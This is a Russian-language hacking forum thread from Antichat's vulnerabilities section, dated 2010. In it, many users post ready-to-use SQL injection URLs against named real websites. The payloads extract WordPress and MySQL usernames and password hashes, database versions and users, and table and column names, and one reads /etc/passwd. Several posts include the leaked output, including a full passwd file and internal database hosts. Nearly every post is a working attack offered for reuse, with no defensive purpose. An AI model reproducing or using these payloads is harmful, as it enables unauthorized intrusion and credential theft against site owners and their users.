ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11561  
Старый 05.03.2010, 09:13
Аватар для Bramin
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://jrandrachel.com/wordpress/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--

http://nudephotocontest.com/wp-content/plugins/photoracer/viewimg.php?id=-4+union+select+1,concat_ws(user_pass,0x3a,user_log in)+from+wp_users--

http://www.levelesyeux.com/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--

http://www.cagou.com/blog/wp-content/plugins/photoracer/viewimg.php?id=-31+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--

http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-10+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--

http://my.brilliantspot.com/wp_my/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws(user_login,0x3a,user_p ass)+from+wp_users--

http://www.ilovepasta.it/pasta/wp-content/plugins/photoracer/viewimg.php?id=-2+union+select+1,concat_ws(user_login,0x3a,user_pa ss)+from+wp_users--

http://tronderglass.no/pfNewsDetail.php?NewsId=-12+union+select+1,2,group_concat(TABLE_NAME),4+fro m+information_schema.tables--
 
Ответить с цитированием

  #11562  
Старый 05.03.2010, 10:02
Аватар для Byte_
Byte_
Участник форума
Регистрация: 07.09.2008
Сообщений: 139
Провел на форуме:
351188

Репутация: 65
По умолчанию

http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user _pass%29+from+wp_users--
http://www.intothepicture.com/wp-content/plugins/photoracer/viewimg.php?id=-30+union+select+1,concat_ws%28user_login,0x3a,user _pass%29+from+wp_users--
=)
 
Ответить с цитированием

  #11563  
Старый 05.03.2010, 23:52
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Цитата:
http://worksystem.sourceforge.net/worksystem_4_0_30/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+unio n+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
w101493rw@172.29.30.53 | 5.0.51a-log

Цитата:
http://www.artpeinture.fr/work/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,version(),3,user(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
artpeintqtarata@10.0.105.14 | 5.0.90-log

Цитата:
http://www.immodefrancecotedazur.com/work/module/news/view_news.php?select_news=12+union+select+1,user() ,3,database(),version(),6,7,8,9,10,11,12+--+
icadeadb2009@10.0.84.51 | 5.0.90-log

Цитата:
http://www.alainmaillet.com/work/module/forum/detailforum.php?select_forum=3+union+select+1,2,us er(),4,version(),6,7,8+--+&work_url=2fa5af6c22#
dbo263010652@212.227.29.138 | 5.0.81-log

Подробности тут
 
Ответить с цитированием

  #11564  
Старый 06.03.2010, 00:28
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Цитата:
http://www.graycell.ru/mask/%EA'+UNION+SELECT+1,concat_ws(':',USER(),DATABASE( ),VERSION())+UNION+SELECT+1,2+'
GRAYCELL@LOCALHOST:WWWGRAYCELLRU:5.0.70
Таблы немогу прочитать, или доступа нет или руки кривые...
Цитата:
http://www.graycell.ru/mask/%EA'+UNION+SELECT+1,LOAD_FILE('/etc/passwd')+UNION+SELECT+1,2+'
Цитата:
BIN:X:1:1:BIN:/BIN:/BIN/FALSE
DAEMON:X:2:2AEMON:/SBIN:/BIN/FALSE
ADM:X:3:4:ADM:/VAR/ADM:/BIN/FALSE
LP:X:4:7:LP:/VAR/SPOOL/LPD:/BIN/FALSE
SYNC:X:5:0:SYNC:/SBIN:/BIN/SYNC
SHUTDOWN:X:6:0:SHUTDOWN:/SBIN:/SBIN/SHUTDOWN
HALT:X:7:0:HALT:/SBIN:/SBIN/HALT
MAIL:X:8:12:MAIL:/VAR/SPOOL/MAIL:/BIN/FALSE
NEWS:X:9:13:NEWS:/USR/LIB/NEWS:/BIN/FALSE
UUCP:X:10:14:UUCP:/VAR/SPOOL/UUCPPUBLIC:/BIN/FALSE
OPERATOR:X:11:0:OPERATOR:/ROOT:/BIN/BASH
MAN:X:13:15:MAN:/USR/SHARE/MAN:/BIN/FALSE
POSTMASTER:X:14:12:POSTMASTER:/VAR/SPOOL/MAIL:/BIN/FALSE
POSTGRES:X:70:70::/VAR/LIB/POSTGRESQL:/BIN/BASH
NUT:X:84:84:NUT:/VAR/STATE/NUT:/BIN/FALSE
POSTFIX:X:207:207:POSTFIX:/VAR/SPOOL/POSTFIX:/BIN/FALSE
SMMSP:X:209:209:SMMSP:/VAR/SPOOL/MQUEUE:/BIN/FALSE
PORTAGE:X:250:250:PORTAGE:/VAR/TMP/PORTAGE:/BIN/FALSE
NOBODY:X:65534:65534:NOBODY:/:/BIN/FALSE
SSHD:X:22:22:ADDED BY PORTAGE FOR OPENSSH:/VAR/EMPTY:/USR/SBIN/NOLOGIN
MYSQL:X:60:60:ADDED BY PORTAGE FOR MYSQL:/DEV/NULL:/SBIN/NOLOGIN
CRON:X:16:16:ADDED BY PORTAGE FOR CRONBASE:/VAR/SPOOL/CRON:/SBIN/NOLOGIN
FTP:X:21:21:ADDED BY PORTAGE FOR FTPBASE:/HOME/FTP:/SBIN/NOLOGIN
PROFTPD:X:101:407:ADDED BY PORTAGE FOR PROFTPD:/DEV/NULL:/SBIN/NOLOGIN
APACHE:X:81:81:ADDED BY PORTAGE FOR APACHE:/VAR/WWW:/SBIN/NOLOGIN
WEBMASTER:X:1000:1000:ALEKSEY PISKUNOV:/HOME/WEBMASTER:/BIN/BASH
DOVECOT:X:97:97:ADDED BY PORTAGE FOR DOVECOT:/DEV/NULL:/SBIN/NOLOGIN
RPC:X:111:111:ADDED BY PORTAGE FOR PORTMAP:/DEV/NULL:/SBIN/NOLOGIN
 
Ответить с цитированием

  #11565  
Старый 06.03.2010, 02:07
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.aquafeed.com.tw/big5/new_detail.php?id=-2+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706 173737764),0x7873716C696E6A656E64),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17

Database Version: 5.0.16-log
Database name: aquafeed_db
User name: WebSiteOwner@localhost
 
Ответить с цитированием

  #11566  
Старый 06.03.2010, 02:23
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Код:
http://greenconsultancy.com/print_view.php?pageType=page&id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--+
greenconsult@192.168.0.8:5.0.58-enterprise-gpl:greenconsult
Код:
http://www.sflcn.com/story.php?id=-8069+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8
bahamagi_sfcndat@localhost:5.1.30:bahamagi_sfcnDat a
Код:
http://www.clockmarket.ru/catalog/show_large.php?clock_id=-1452+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,concat_ws(0x3a,user(),version(),database()),36,37,38,39&popup=1
c2_clockmarket@localhost:5.0.75-0ubuntu10.2:c2_clockmarket
Код:
http://mmorpgtop.woano.lv/index.php?do=out&id=-1+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
5.0.89-community-log:mmorpg_mmorpgtop:mmorpg_purgen@localhost
 
Ответить с цитированием

  #11567  
Старый 06.03.2010, 09:22
Аватар для n0n@me
n0n@me
Новичок
Регистрация: 19.02.2010
Сообщений: 1
Провел на форуме:
12389

Репутация: 6
По умолчанию

http://www.voiphouse.co.uk/en/shop/index.php?cat_id=-912+union+select+1,concat_ws%280x2f,user,password% 29+from+mysql.user--

Последний раз редактировалось Jokester; 06.03.2010 в 12:29.. Причина: хеши запрещены
 
Ответить с цитированием

  #11568  
Старый 06.03.2010, 13:56
Аватар для Financier
Financier
Новичок
Регистрация: 12.12.2009
Сообщений: 5
Провел на форуме:
28808

Репутация: 9
По умолчанию

Код:
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+order+by+27--
Код:
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
5.0.51a-24+lenny2

Код:
http://www.hatjecantz.de/controller.php?cmd=kunstlexikon&id=9999+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+limit+83,1--
Цитата:
Artinfo
Artinfo_Startseite
Artinfo_Titel
Bestseller
Buchtipp
Buchtipp_Startseite
CE_Angebote
Download
Empfehlung_Titel
Galerie_Startseite
Highlight
Interviews
Interviews_Startseite_Sort
Interviews_Titel
Kuenstler
Links
Neu
Neuerscheinung
News
News_Startseite_Sort
News_Titel
OrderItems
Orders
Partner
Person
Schlagworte_de
Schlagworte_en
Titellinks
VI_ADR_Anschrift
VI_ADR_Anschrift_1267664404281
VI_ADR_Anschrift_1267750804304
VI_ADR_Anschrift_1267837203272
VI_ADR_Firma
VI_ADR_Firma_1267664404281
VI_ADR_Firma_1267750804304
VI_ADR_Firma_1267837203272
VI_ADR_Person
VI_ADR_Person_1267664404281
VI_ADR_Person_1267750804304
VI_ADR_Person_1267837203272
VI_AdressenTexte
VI_AdressenTexte_1267664404281
VI_AdressenTexte_1267750804304
VI_AdressenTexte_1267837203272
VI_Bilder
VI_Bilder_1267664404281
VI_Bilder_1267750804304
VI_Bilder_1267837203272
VI_Einbandarten
VI_Einbandarten_1267664404281
VI_Einbandarten_1267750804304
VI_Einbandarten_1267837203272
VI_Termine
VI_Termine_1267664404281
VI_Termine_1267750804304
VI_Termine_1267837203272
VI_Titel
VI_TitelAuflagen
VI_TitelAuflagen_1267664404281
VI_TitelAuflagen_1267750804304
VI_TitelAuflagen_1267837203272
VI_TitelMerkmale
VI_TitelMerkmale_1267664404281
VI_TitelMerkmale_1267750804304
VI_TitelMerkmale_1267837203272
VI_TitelPreise
VI_TitelPreise_1267664404281
и т.д. надоело=)
Цитата:
http://www.hatjecantz.de/robots.txt
Disallow: /admin/
Disallow: /wwwstats/
 
Ответить с цитированием

  #11569  
Старый 06.03.2010, 14:08
Аватар для [Undead]
[Undead]
Banned
Регистрация: 15.05.2009
Сообщений: 2
Провел на форуме:
99937

Репутация: 2
По умолчанию

Цитата:
http://www.democracy.ru/article.php?id=1447+union+select+1,2,TABLE_NAME,4, 5,6,7,8,9,10,11,12,13,14,version(),16+FROM+INFORMA TION_SCHEMA.TABLES+LIMIT+1,1--
5.0.51a-24+lenny2
 
Ответить с цитированием

  #11570  
Старый 06.03.2010, 18:53
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://police.am/page.php?section=pet&lenguige=am&id_menu=1+and+1=1

blind

http://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,column_nam e,3,4,5,6,7,8,9,10+from+information_schema.columns +where+table_name=CHAR(97,%20100,%20109,%20105,%20 110)/*

ttp://www.avangard.am/index/main.php?id=1781+and+1=0+union+select+1,concat(use r,char(58),password),3,4,5,6,7,8,9,10+from+mysql.u ser/*

the same site

http://www.lusamut.net/level0_.php?cat_=-21+and+1=0+union+select+concat(username,char(58),p assword),2,3+from+users&slog=22

look at the <>title

http://www.armjob.am/resume.php?id=11'+union+select+1,2,concat(email_us er,char(58),pass_user)+from+job_user/*

Последний раз редактировалось Jokester; 06.03.2010 в 19:12..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ